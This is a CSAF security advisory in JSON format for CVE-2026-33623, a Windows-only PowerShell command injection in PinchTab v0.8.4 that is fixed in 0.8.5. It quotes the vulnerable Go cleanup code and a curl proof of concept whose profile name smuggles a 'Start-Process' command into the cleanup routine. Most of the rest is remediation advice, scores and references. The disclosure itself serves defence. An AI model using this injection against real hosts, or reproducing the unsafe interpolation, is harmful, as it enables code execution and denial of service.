{
    "document": {
        "category": "csaf_base",
        "csaf_version": "2.0",
        "distribution": {
            "tlp": {
                "label": "WHITE"
            }
        },
        "lang": "en",
        "notes": [
            {
                "category": "legal_disclaimer",
                "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control or guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to the cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability to use the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy or incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of forum also applies to the court in summary proceedings."
            }
        ],
        "publisher": {
            "category": "coordinator",
            "contact_details": "cert@ncsc.nl",
            "name": "National Cyber Security Centre",
            "namespace": "https://www.ncsc.nl/"
        },
        "title": "CVE-2026-33623",
        "tracking": {
            "current_release_date": "2026-03-31T16:25:39.275754Z",
            "generator": {
                "date": "2026-02-17T15:00:00Z",
                "engine": {
                    "name": "V.E.L.M.A",
                    "version": "1.7"
                }
            },
            "id": "CVE-2026-33623",
            "initial_release_date": "2026-03-24T20:55:24.104423Z",
            "revision_history": [
                {
                    "date": "2026-03-24T20:55:24.104423Z",
                    "number": "1",
                    "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (3).| CWES updated (1)."
                },
                {
                    "date": "2026-03-24T20:55:27.979639Z",
                    "number": "2",
                    "summary": "NCSC Score created."
                },
                {
                    "date": "2026-03-25T18:12:47.772258Z",
                    "number": "3",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products created (1).| References created (2).| CWES updated (1)."
                },
                {
                    "date": "2026-03-25T18:12:49.748357Z",
                    "number": "4",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-26T21:27:27.329535Z",
                    "number": "5",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (2).| CWES updated (1)."
                },
                {
                    "date": "2026-03-26T21:27:33.117139Z",
                    "number": "6",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-26T21:38:42.362282Z",
                    "number": "7",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products created (1).| References created (2).| CWES updated (1)."
                },
                {
                    "date": "2026-03-26T21:38:50.074493Z",
                    "number": "8",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-27T00:14:03.596154Z",
                    "number": "9",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| References created (2)."
                },
                {
                    "date": "2026-03-27T20:56:40.290234Z",
                    "number": "10",
                    "summary": "Source connected.| CVE status created. (valid)| EPSS created."
                },
                {
                    "date": "2026-03-27T20:56:43.724523Z",
                    "number": "11",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-27T21:26:35.402093Z",
                    "number": "12",
                    "summary": "Unknown change."
                },
                {
                    "date": "2026-03-28T07:57:43.896701Z",
                    "number": "13",
                    "summary": "References created (1)."
                },
                {
                    "date": "2026-03-31T16:25:00.739744Z",
                    "number": "14",
                    "summary": "Products connected (1).| Product Identifiers created (1).| Exploits created (1)."
                },
                {
                    "date": "2026-03-31T16:25:06.889773Z",
                    "number": "15",
                    "summary": "NCSC Score updated."
                }
            ],
            "status": "interim",
            "version": "15"
        }
    },
    "product_tree": {
        "branches": [
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/<0.8.5",
                                "product": {
                                    "name": "vers:unknown/<0.8.5",
                                    "product_id": "CSAFPID-5919278",
                                    "product_identification_helper": {
                                        "cpe": "cpe:2.3:a:pinchtab:pinchtab:*:*:*:*:*:*:*:*"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/>=0|<0.8.5",
                                "product": {
                                    "name": "vers:unknown/>=0|<0.8.5",
                                    "product_id": "CSAFPID-5907190"
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "pinchtab"
                    }
                ],
                "category": "vendor",
                "name": "pinchtab"
            }
        ]
    },
    "vulnerabilities": [
        {
            "cve": "CVE-2026-33623",
            "cwe": {
                "id": "CWE-78",
                "name": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')"
            },
            "notes": [
                {
                    "category": "description",
                    "text": "### Summary\nPinchTab `v0.8.4` contains a Windows-only command injection issue in the orphaned Chrome cleanup path. When an instance is stopped, the Windows cleanup routine builds a PowerShell `-Command` string using a `needle` derived from the profile path. In `v0.8.4`, that string interpolation escapes backslashes but does not safely neutralize other PowerShell metacharacters.\n\nIf an attacker can launch an instance using a crafted profile name and then trigger the cleanup path, they may be able to execute arbitrary PowerShell commands on the Windows host in the security context of the PinchTab process user.\n\nThis is not an unauthenticated internet RCE. It requires authenticated, administrative-equivalent API access to instance lifecycle endpoints, and the resulting command execution inherits the permissions of the PinchTab OS user rather than bypassing host privilege boundaries.\n\n### Details\n**Issue 1 — PowerShell command string built with interpolated user-influenced data (`internal/bridge/cleanup_windows.go` in `v0.8.4`):**\n\n```\nfunc findPIDsByPowerShell(needle string) []int {\n    escaped := strings.ReplaceAll(needle, `\\`, `\\\\`)\n    cmd := exec.Command(\"powershell\", \"-NoProfile\", \"-Command\",\n        fmt.Sprintf(`Get-CimInstance Win32_Process -Filter \"Name='chrome.exe'\" | `+\n            `Where-Object { $_.CommandLine -like '*%s*' } | `+\n            `Select-Object -ExpandProperty ProcessId`, escaped))\n}\n```\n\nThe `needle` value is interpolated directly into a PowerShell command string. Escaping backslashes alone is not sufficient to make arbitrary user-controlled content safe inside a PowerShell expression.\n\n**Issue 2 — `needle` is derived from launchable profile names:**\n\nThe cleanup path uses:\n\n```\nfindPIDsByPowerShell(fmt.Sprintf(\"--user-data-dir=%s\", profileDir))\n```\n\nThe profile directory is derived from the instance/profile name used during launch. 
In `v0.8.4`, profile name validation rejected path traversal characters such as `/`, `\\`, and `..`, but it did not comprehensively block PowerShell metacharacters such as single quotes or statement separators.\n\n**Issue 3 — Trigger path is reachable through normal instance lifecycle APIs:**\n\nThe attack path described in the report uses:\n\n1. `POST /instances/launch` with a crafted `name`\n2. `POST /instances/{id}/stop` to trigger the cleanup routine\n\nThat means exploitability depends on access to privileged orchestration endpoints, not on local shell access.\n\n### PoC\n**Environment assumptions**\n\n- PinchTab `v0.8.4`\n- Windows host\n- Valid API token with access to instance lifecycle endpoints\n\n**Example sequence**\n\n```bash\ncurl -X POST http://HOST:9867/instances/launch \\\n  -H \"Authorization: Bearer <TOKEN>\" \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\n    \"name\": \"poc'\\''; Start-Process calc; $x='\\''\",\n    \"mode\": \"headless\"\n  }'\n```\n\nThen:\n\n```bash\ncurl -X POST http://HOST:9867/instances/<INSTANCE_ID>/stop \\\n  -H \"Authorization: Bearer <TOKEN>\"\n```\n\nIf the payload survives the launch path and reaches the vulnerable cleanup code, the injected PowerShell executes when the Windows cleanup routine runs.\n\n### Impact\n1. Arbitrary PowerShell command execution on Windows as the PinchTab process user.\n2. Full compromise of data and processes accessible to that user account.\n3. Possible persistence or host-level follow-on actions within the same user security context.\n4. Potential repeated execution in restart-heavy environments if the vulnerable cleanup path is triggered repeatedly.\n\n### Scope And Limits\n1. Windows only.\n2. Requires authenticated, administrative-equivalent API access to instance lifecycle endpoints.\n3. Does not by itself elevate beyond the privileges of the Windows user running PinchTab.\n4. 
This is stronger than a policy bypass or low-risk hardening gap, but narrower than unauthenticated remote code execution.\n\n### Suggested Remediation\n1. Do not interpolate user-influenced values into PowerShell `-Command` strings.\n2. Pass search terms through environment variables or structured arguments instead of code generation.\n3. Keep strict validation on profile names, but do not rely on input validation alone as the primary defense.\n4. Add regression tests covering PowerShell metacharacters in profile-derived values on Windows.\n\n\n\n\n### **Steps to Reproduce:**\n\n**Environment Setup:**\nTarget: PinchTab v0.8.4 (Windows build)\nPlatform: Windows only\n\n**1. Launch Instance with Malicious Profile Name**\n\n```\ncurl -X POST http://[server-ip]:9867/instances/launch \\\n  -H \"Authorization: Bearer <TOKEN>\" \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\n    \"name\": \"poc'\\''; Start-Process calc; $x='\\''\",\n    \"mode\": \"headless\"\n  }'\n```\n\n**2. Stop Instance to Trigger Injection**\n\n```\ncurl -X POST http://[server-ip]:9867/instances/<INSTANCE_ID>/stop \\\n  -H \"Authorization: Bearer <TOKEN>\"\n```\n\n### **Additional Observation — Repeated Execution (DoS Amplification)**\n\n**In environments where instances are automatically restarted (e.g., always-on mode), the cleanup routine is triggered repeatedly.**\n\nBecause the injection occurs during cleanup, the payload is executed on every restart cycle:\nContinuous spawning of calc.exe processes\nResource exhaustion\nSystem instability or crash\n\n### **Impact**\n\nThis vulnerability allows an authenticated attacker to execute arbitrary PowerShell commands on the Windows host running PinchTab. 
Impact - full host compromise including command execution, persistence, and data access; Root Cause - user-controlled input (profile name) is embedded into a PowerShell command without proper neutralization of special characters; Remediation - avoid constructing shell commands using string interpolation, enforce strict input validation (allowlist), and use structured command execution instead of powershell -Command.\n\nAdditionally, because the injection is triggered during the cleanup routine, environments with automatic instance restart behavior may repeatedly execute the injected payload, leading to uncontrolled process creation and resource exhaustion. This enables a reliable denial-of-service condition in addition to remote code execution.",
                    "title": "github - https://api.github.com/advisories/GHSA-p8mm-644p-phmh"
                },
                {
                    "category": "description",
                    "text": "### Summary\nPinchTab `v0.8.4` contains a Windows-only command injection issue in the orphaned Chrome cleanup path. When an instance is stopped, the Windows cleanup routine builds a PowerShell `-Command` string using a `needle` derived from the profile path. In `v0.8.4`, that string interpolation escapes backslashes but does not safely neutralize other PowerShell metacharacters.\n\nIf an attacker can launch an instance using a crafted profile name and then trigger the cleanup path, they may be able to execute arbitrary PowerShell commands on the Windows host in the security context of the PinchTab process user.\n\nThis is not an unauthenticated internet RCE. It requires authenticated, administrative-equivalent API access to instance lifecycle endpoints, and the resulting command execution inherits the permissions of the PinchTab OS user rather than bypassing host privilege boundaries.\n\n### Details\n**Issue 1 — PowerShell command string built with interpolated user-influenced data (`internal/bridge/cleanup_windows.go` in `v0.8.4`):**\n\n```\nfunc findPIDsByPowerShell(needle string) []int {\n    escaped := strings.ReplaceAll(needle, `\\`, `\\\\`)\n    cmd := exec.Command(\"powershell\", \"-NoProfile\", \"-Command\",\n        fmt.Sprintf(`Get-CimInstance Win32_Process -Filter \"Name='chrome.exe'\" | `+\n            `Where-Object { $_.CommandLine -like '*%s*' } | `+\n            `Select-Object -ExpandProperty ProcessId`, escaped))\n}\n```\n\nThe `needle` value is interpolated directly into a PowerShell command string. Escaping backslashes alone is not sufficient to make arbitrary user-controlled content safe inside a PowerShell expression.\n\n**Issue 2 — `needle` is derived from launchable profile names:**\n\nThe cleanup path uses:\n\n```\nfindPIDsByPowerShell(fmt.Sprintf(\"--user-data-dir=%s\", profileDir))\n```\n\nThe profile directory is derived from the instance/profile name used during launch. 
In `v0.8.4`, profile name validation rejected path traversal characters such as `/`, `\\`, and `..`, but it did not comprehensively block PowerShell metacharacters such as single quotes or statement separators.\n\n**Issue 3 — Trigger path is reachable through normal instance lifecycle APIs:**\n\nThe attack path described in the report uses:\n\n1. `POST /instances/launch` with a crafted `name`\n2. `POST /instances/{id}/stop` to trigger the cleanup routine\n\nThat means exploitability depends on access to privileged orchestration endpoints, not on local shell access.\n\n### PoC\n**Environment assumptions**\n\n- PinchTab `v0.8.4`\n- Windows host\n- Valid API token with access to instance lifecycle endpoints\n\n**Example sequence**\n\n```bash\ncurl -X POST http://HOST:9867/instances/launch \\\n  -H \"Authorization: Bearer <TOKEN>\" \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\n    \"name\": \"poc'\\''; Start-Process calc; $x='\\''\",\n    \"mode\": \"headless\"\n  }'\n```\n\nThen:\n\n```bash\ncurl -X POST http://HOST:9867/instances/<INSTANCE_ID>/stop \\\n  -H \"Authorization: Bearer <TOKEN>\"\n```\n\nIf the payload survives the launch path and reaches the vulnerable cleanup code, the injected PowerShell executes when the Windows cleanup routine runs.\n\n### Impact\n1. Arbitrary PowerShell command execution on Windows as the PinchTab process user.\n2. Full compromise of data and processes accessible to that user account.\n3. Possible persistence or host-level follow-on actions within the same user security context.\n4. Potential repeated execution in restart-heavy environments if the vulnerable cleanup path is triggered repeatedly.\n\n### Scope And Limits\n1. Windows only.\n2. Requires authenticated, administrative-equivalent API access to instance lifecycle endpoints.\n3. Does not by itself elevate beyond the privileges of the Windows user running PinchTab.\n4. 
This is stronger than a policy bypass or low-risk hardening gap, but narrower than unauthenticated remote code execution.\n\n### Suggested Remediation\n1. Do not interpolate user-influenced values into PowerShell `-Command` strings.\n2. Pass search terms through environment variables or structured arguments instead of code generation.\n3. Keep strict validation on profile names, but do not rely on input validation alone as the primary defense.\n4. Add regression tests covering PowerShell metacharacters in profile-derived values on Windows.\n\n\n\n\n### **Steps to Reproduce:**\n\n**Environment Setup:**\nTarget: PinchTab v0.8.4 (Windows build)\nPlatform: Windows only\n\n**1. Launch Instance with Malicious Profile Name**\n\n```\ncurl -X POST http://[server-ip]:9867/instances/launch \\\n  -H \"Authorization: Bearer <TOKEN>\" \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\n    \"name\": \"poc'\\''; Start-Process calc; $x='\\''\",\n    \"mode\": \"headless\"\n  }'\n```\n\n**2. Stop Instance to Trigger Injection**\n\n```\ncurl -X POST http://[server-ip]:9867/instances/<INSTANCE_ID>/stop \\\n  -H \"Authorization: Bearer <TOKEN>\"\n```\n\n### **Additional Observation — Repeated Execution (DoS Amplification)**\n\n**In environments where instances are automatically restarted (e.g., always-on mode), the cleanup routine is triggered repeatedly.**\n\nBecause the injection occurs during cleanup, the payload is executed on every restart cycle:\nContinuous spawning of calc.exe processes\nResource exhaustion\nSystem instability or crash\n\n### **Impact**\n\nThis vulnerability allows an authenticated attacker to execute arbitrary PowerShell commands on the Windows host running PinchTab. 
Impact - full host compromise including command execution, persistence, and data access; Root Cause - user-controlled input (profile name) is embedded into a PowerShell command without proper neutralization of special characters; Remediation - avoid constructing shell commands using string interpolation, enforce strict input validation (allowlist), and use structured command execution instead of powershell -Command.\n\nAdditionally, because the injection is triggered during the cleanup routine, environments with automatic instance restart behavior may repeatedly execute the injected payload, leading to uncontrolled process creation and resource exhaustion. This enables a reliable denial-of-service condition in addition to remote code execution.",
                    "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGHSA-p8mm-644p-phmh.json?alt=media"
                },
                {
                    "category": "description",
                    "text": "PinchTab: OS Command Injection via Profile Name in Windows Cleanup Routine Enables Arbitrary Command Execution in github.com/pinchtab/pinchtab",
                    "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGO-2026-4823.json?alt=media"
                },
                {
                    "category": "description",
                    "text": "PinchTab is a standalone HTTP server that gives AI agents direct control over a Chrome browser. PinchTab `v0.8.4` contains a Windows-only command injection issue in the orphaned Chrome cleanup path. When an instance is stopped, the Windows cleanup routine builds a PowerShell `-Command` string using a `needle` derived from the profile path. In `v0.8.4`, that string interpolation escapes backslashes but does not safely neutralize other PowerShell metacharacters. If an attacker can launch an instance using a crafted profile name and then trigger the cleanup path, they may be able to execute arbitrary PowerShell commands on the Windows host in the security context of the PinchTab process user. This is not an unauthenticated internet RCE. It requires authenticated, administrative-equivalent API access to instance lifecycle endpoints, and the resulting command execution inherits the permissions of the PinchTab OS user rather than bypassing host privilege boundaries. Version 0.8.5 contains a patch for the issue.",
                    "title": "nvd - https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33623"
                },
                {
                    "category": "description",
                    "text": "PinchTab is a standalone HTTP server that gives AI agents direct control over a Chrome browser. PinchTab `v0.8.4` contains a Windows-only command injection issue in the orphaned Chrome cleanup path. When an instance is stopped, the Windows cleanup routine builds a PowerShell `-Command` string using a `needle` derived from the profile path. In `v0.8.4`, that string interpolation escapes backslashes but does not safely neutralize other PowerShell metacharacters. If an attacker can launch an instance using a crafted profile name and then trigger the cleanup path, they may be able to execute arbitrary PowerShell commands on the Windows host in the security context of the PinchTab process user. This is not an unauthenticated internet RCE. It requires authenticated, administrative-equivalent API access to instance lifecycle endpoints, and the resulting command execution inherits the permissions of the PinchTab OS user rather than bypassing host privilege boundaries. Version 0.8.5 contains a patch for the issue.",
                    "title": "cveprojectv5 - https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33623.json"
                },
                {
                    "category": "other",
                    "text": "0.00128",
                    "title": "EPSS"
                },
                {
                    "category": "other",
                    "text": "3.7",
                    "title": "NCSC Score"
                },
                {
                    "category": "other",
                    "text": "There is exploit data available from source Nvd, The value of the most recent CVSS (V3) score, The value of the most recent EPSS score, Exploit code publicly available",
                    "title": "NCSC Score top decreasing factors"
                }
            ],
            "product_status": {
                "known_affected": [
                    "CSAFPID-5907190",
                    "CSAFPID-5919278"
                ]
            },
            "references": [
                {
                    "category": "external",
                    "summary": "Source - github",
                    "url": "https://api.github.com/advisories/GHSA-p8mm-644p-phmh"
                },
                {
                    "category": "external",
                    "summary": "Source - osv",
                    "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGHSA-p8mm-644p-phmh.json?alt=media"
                },
                {
                    "category": "external",
                    "summary": "Source - nvd",
                    "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33623"
                },
                {
                    "category": "external",
                    "summary": "Source - cveprojectv5",
                    "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33623.json"
                },
                {
                    "category": "external",
                    "summary": "Source - osv",
                    "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGO-2026-4823.json?alt=media"
                },
                {
                    "category": "external",
                    "summary": "Source - first",
                    "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd; osv",
                    "url": "https://github.com/pinchtab/pinchtab/security/advisories/GHSA-p8mm-644p-phmh"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd; osv",
                    "url": "https://github.com/pinchtab/pinchtab/commit/25b3374bdcdf0dad32c44d5d726bf953238cd8bd"
                },
                {
                    "category": "external",
                    "summary": "Reference - github",
                    "url": "https://github.com/advisories/GHSA-p8mm-644p-phmh"
                },
                {
                    "category": "external",
                    "summary": "Reference - github",
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33623"
                }
            ],
            "scores": [
                {
                    "cvss_v3": {
                        "version": "3.1",
                        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:L",
                        "baseScore": 6.7,
                        "baseSeverity": "MEDIUM"
                    },
                    "products": [
                        "CSAFPID-5907190",
                        "CSAFPID-5919278"
                    ]
                }
            ],
            "title": "CVE-2026-33623"
        }
    ]
}